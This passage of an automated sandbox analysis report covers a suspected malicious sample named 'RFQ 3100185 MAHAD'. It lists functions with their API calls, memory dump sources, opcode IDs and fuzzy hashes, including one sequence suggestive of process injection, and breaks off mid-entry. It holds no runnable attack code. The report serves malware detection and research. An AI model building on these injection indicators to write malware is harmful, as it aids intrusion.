                                                            • Instruction Fuzzy Hash: 7EE0C2E121070192CA206538EE48EB313DC0F04312714080EB51DE3342EF2CE84084B4
                                                            APIs
                                                              • Part of subcall function 007B22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007B24F1), ref: 007B2303
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007B25A1
                                                            • CoInitialize.OLE32(00000000), ref: 007B2618
                                                            • CloseHandle.KERNEL32(00000000), ref: 0082503A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID:
                                                            • API String ID: 3815369404-0
                                                            • Opcode ID: e4fa6a3b6ec49d7050a840791577d2440b4a5a52254aaa947fb4220224d4ff67
                                                            • Instruction ID: 6687b68e575914b1b1f70fe69f9698a87584f918326112bfc174de6b8b0745d6
                                                            • Opcode Fuzzy Hash: e4fa6a3b6ec49d7050a840791577d2440b4a5a52254aaa947fb4220224d4ff67
                                                            • Instruction Fuzzy Hash: 7171BFB49213818ACF14DFAEA89D594BBA5F799344780416ED20DCBF7ADB38C484CF14
                                                            APIs
                                                            • _strcat.LIBCMT ref: 008108FD
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            • _wcscpy.LIBCMT ref: 0081098C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf_strcat_wcscpy
                                                            • String ID:
                                                            • API String ID: 1012013722-0
                                                            • Opcode ID: a355e0a6fab981c21c190910cd1f3d2872740cd4bbaa2dd1a3d54b4a66bca53a
                                                            • Instruction ID: 7284c4485e1d9505de06f3fe2771e5179040b16f85720dff910a3c42b8b9475d
                                                            • Opcode Fuzzy Hash: a355e0a6fab981c21c190910cd1f3d2872740cd4bbaa2dd1a3d54b4a66bca53a
                                                            • Instruction Fuzzy Hash: 2A914B34A00614DFCB18DF18C995AA9B7E9FF49314B55806AE81ACF392DB74ED81CF80
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 007B3A73
                                                              • Part of subcall function 007D1405: __lock.LIBCMT ref: 007D140B
                                                              • Part of subcall function 007B3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007B3AF3
                                                              • Part of subcall function 007B3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B3B08
                                                              • Part of subcall function 007B3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,007B3AA3,?), ref: 007B3D45
                                                              • Part of subcall function 007B3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,007B3AA3,?), ref: 007B3D57
                                                              • Part of subcall function 007B3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00871148,00871130,?,?,?,?,007B3AA3,?), ref: 007B3DC8
                                                              • Part of subcall function 007B3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,007B3AA3,?), ref: 007B3E48
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B3AB3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 924797094-0
                                                            • Opcode ID: 4e5db21aff816a3647ff052f410e952febe840f8c6d4e1282cf4b71749b0ccef
                                                            • Instruction ID: 0c741bd87931de029d83dba8d385f52e19c8015212b3355f189296e0d1c07743
                                                            • Opcode Fuzzy Hash: 4e5db21aff816a3647ff052f410e952febe840f8c6d4e1282cf4b71749b0ccef
                                                            • Instruction Fuzzy Hash: 8F118C71A04341DBC710EF69EC4DA4ABBE8FB94710F00891EF488872A2DB749585CFA2
                                                            APIs
                                                            • ___lock_fhandle.LIBCMT ref: 007DEA29
                                                            • __close_nolock.LIBCMT ref: 007DEA42
                                                              • Part of subcall function 007D7BDA: __getptd_noexit.LIBCMT ref: 007D7BDA
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                            • String ID:
                                                            • API String ID: 1046115767-0
                                                            • Opcode ID: fe9623f58a77f2d8535127b89cc5fd4216f922ef5855bc0d398d8dafb966a714
                                                            • Instruction ID: ce0259324e18e1c827ab2f78c6264cb793ece5202264c48bd39a45d965e89114
                                                            • Opcode Fuzzy Hash: fe9623f58a77f2d8535127b89cc5fd4216f922ef5855bc0d398d8dafb966a714
                                                            • Instruction Fuzzy Hash: A9119E72815611DAD317BB6488493287A707F81331F2A8243E4685F3E2DBBC8C40CAA1
                                                            APIs
                                                              • Part of subcall function 007D395C: __FF_MSGBANNER.LIBCMT ref: 007D3973
                                                              • Part of subcall function 007D395C: __NMSG_WRITE.LIBCMT ref: 007D397A
                                                              • Part of subcall function 007D395C: RtlAllocateHeap.NTDLL(01240000,00000000,00000001,00000001,00000000,?,?,007CF507,?,0000000E), ref: 007D399F
                                                            • std::exception::exception.LIBCMT ref: 007CF51E
                                                            • __CxxThrowException@8.LIBCMT ref: 007CF533
                                                              • Part of subcall function 007D6805: RaiseException.KERNEL32(?,?,0000000E,00866A30,?,?,?,007CF538,0000000E,00866A30,?,00000001), ref: 007D6856
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 03b6a535558f0c0d1e3b795fc9c9b190f4a3eaa4ca9aa9bc96eea4cd80e325bb
                                                            • Instruction ID: fbcc8d893c1ab6861fc90b1d1393349b014d5e5ef0e1a10e4c25c848d522d62c
                                                            • Opcode Fuzzy Hash: 03b6a535558f0c0d1e3b795fc9c9b190f4a3eaa4ca9aa9bc96eea4cd80e325bb
                                                            • Instruction Fuzzy Hash: F8F0AF3110422EA7DB04BF98E905EDE77A9AF00394F60402EFA08E2281DBB8D75496E5
                                                            APIs
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            • __lock_file.LIBCMT ref: 007D3629
                                                              • Part of subcall function 007D4E1C: __lock.LIBCMT ref: 007D4E3F
                                                            • __fclose_nolock.LIBCMT ref: 007D3634
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 06df9b5aa3da3f8566ceec120b9780717187d6907fb079ab05635562b93e8ded
                                                            • Instruction ID: ce5779603d622c18a90458243a6c1a446108c43d756247a0421d324aa8fee658
                                                            • Opcode Fuzzy Hash: 06df9b5aa3da3f8566ceec120b9780717187d6907fb079ab05635562b93e8ded
                                                            • Instruction Fuzzy Hash: 70F0B471801204EAD7117B75880A76E7BB0AF41731F25815BE465EB3C1CB7CCB019FA6
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0149BD0B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0149BDA1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149BDC3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1291150986.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_149a000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction ID: ca92dd0cc4a9deae914274f5d99129f6211f1b159c33d3d8fd91a35b56f71a5e
                                                            • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction Fuzzy Hash: FD12CE24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                                                            APIs
                                                            • __flush.LIBCMT ref: 007D2A0B
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __flush__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 4101623367-0
                                                            • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                            • Instruction ID: 77e0c1a457db851ce5a7f4724b4ae1926a1fbef03299b033e381e7bdf900ec0f
                                                            • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                            • Instruction Fuzzy Hash: 9C41C8707007069FDB288E69C89056EB7B6EFA4360B24C52FE845D7342EB78ED438B50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 2202d0bf537b36d0b85a16f35779677a5797f86a33618c78f54853acf402ceb1
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 7931B3B5B005059BD718DF58C480A69FBA6FF49340B6486ADE40ACB256DB39EDC1CBD0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: f64ea6616a23161c602c5edc62c5dd69d68eb05a5795c688b565c7136f5cd613
                                                            • Instruction ID: 95660e1e777c10a76627823824de2004fbdb39cd954db39c485446f37429795d
                                                            • Opcode Fuzzy Hash: f64ea6616a23161c602c5edc62c5dd69d68eb05a5795c688b565c7136f5cd613
                                                            • Instruction Fuzzy Hash: E031C235204528DFCB11AF00D484BEE77B5FF48324F20844EEA95AB386DBB4A981CF91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: bbdd1bc6fc2026bdebea249e3412ffcf8e6af698a659e08bf4e0583e1355ab50
                                                            • Instruction ID: 7693d3d2f73d3851491a9f4cbf8cb8a1613bee38b0a301bc08dd5bfc35c8e86b
                                                            • Opcode Fuzzy Hash: bbdd1bc6fc2026bdebea249e3412ffcf8e6af698a659e08bf4e0583e1355ab50
                                                            • Instruction Fuzzy Hash: 87413C70604651CFDB24DF18D484F1ABBE1BF45314F1989ACE99A4B362C376E885CF92
                                                            APIs
                                                              • Part of subcall function 007B4214: FreeLibrary.KERNEL32(00000000,?), ref: 007B4247
                                                            • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007B39FE,?,00000001), ref: 007B41DB
                                                              • Part of subcall function 007B4291: FreeLibrary.KERNEL32(00000000), ref: 007B42C4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load
                                                            • String ID:
                                                            • API String ID: 2391024519-0
                                                            • Opcode ID: 91ffeea96a39850cece716f61f057040bf428e1bbf610b98bed5e5b6a3f04954
                                                            • Instruction ID: 18cf4a56bfdda506b141e789ae88e44f8712564367fe06a2903ea85b9afe6632
                                                            • Opcode Fuzzy Hash: 91ffeea96a39850cece716f61f057040bf428e1bbf610b98bed5e5b6a3f04954
                                                            • Instruction Fuzzy Hash: 3E11A331600316FADB14AB74DD0AFEE77E9BF80700F108429F596E61C2DE78DA44AB61
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 3a4aabb7ad8faa8098289c2aca8ba8fc26dc483c78cf320668dcd2987698cfac
                                                            • Instruction ID: 0bde969eacb6946daf17023a2ffab11ae772fa0cc7af09b8e0ea9f9c4a32ada0
                                                            • Opcode Fuzzy Hash: 3a4aabb7ad8faa8098289c2aca8ba8fc26dc483c78cf320668dcd2987698cfac
                                                            • Instruction Fuzzy Hash: CF211370608601CFDB24DF68D448F6ABBE1BF84304F14496CFA9A4B222D739E855CF92
                                                            APIs
                                                            • ___lock_fhandle.LIBCMT ref: 007DAFC0
                                                              • Part of subcall function 007D7BDA: __getptd_noexit.LIBCMT ref: 007D7BDA
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit$___lock_fhandle
                                                            • String ID:
                                                            • API String ID: 1144279405-0
                                                            • Opcode ID: 69067e5cfc3488c5833bdaf65f90536a47a55d4d3bfbd6261ddb761ebb3922c9
                                                            • Instruction ID: 44d5191a03d2bd5c9a23f0a3127ebaed4ff59e5037b95b8ab9bbbb62a5afcf6a
                                                            • Opcode Fuzzy Hash: 69067e5cfc3488c5833bdaf65f90536a47a55d4d3bfbd6261ddb761ebb3922c9
                                                            • Instruction Fuzzy Hash: 5F11B2B2814600DFD7167FA488497593A70AF41332F2A4243E4345F3E2E7BD8D40DBA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                            • Instruction ID: 69323c21fa2d568ed5bdeb2366140e792cc5d9efba7a8bceb6f95f34f2ee739a
                                                            • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                            • Instruction Fuzzy Hash: A001313150010DFECF05EFA4C9969FEBB74EF20344F10806AB566971A6EA349A89DB61
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 007D2AED
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 922eab3eea06c829b94da4be18bd27774adefac99dfced5fe9c16a371b5e10ca
                                                            • Instruction ID: 29cc6d227d8e77cb9a8dbbc78b06f3450e62dc4820592faffe986d1d2906b9d2
                                                            • Opcode Fuzzy Hash: 922eab3eea06c829b94da4be18bd27774adefac99dfced5fe9c16a371b5e10ca
                                                            • Instruction Fuzzy Hash: F3F06231600205FBDF21AF648C0A79F36B5BF50320F158457F814AA392D77C8A53DB51
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,007B39FE,?,00000001), ref: 007B4286
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 6066e3f9cad01809f29f7b58257e70e73d747287529f8f63e75a97635ac6950d
                                                            • Instruction ID: e3398e529660534369c17c1a942e03bc556849aeebad35bcd210447285a74044
                                                            • Opcode Fuzzy Hash: 6066e3f9cad01809f29f7b58257e70e73d747287529f8f63e75a97635ac6950d
                                                            • Instruction Fuzzy Hash: 7BF03971505702DFCB349F64E894996BBF4BF043253248A3EF1D682612C77A9840EF50
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007B40C6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            • Opcode ID: b8d010f60d540e0c66091f6f5d3fa2ec49d17ab440838d601d11195c0918941c
                                                            • Instruction ID: 374f1127884611ea9cb1db00219a5075a28fe3ebfc51dd42833b221a85267b35
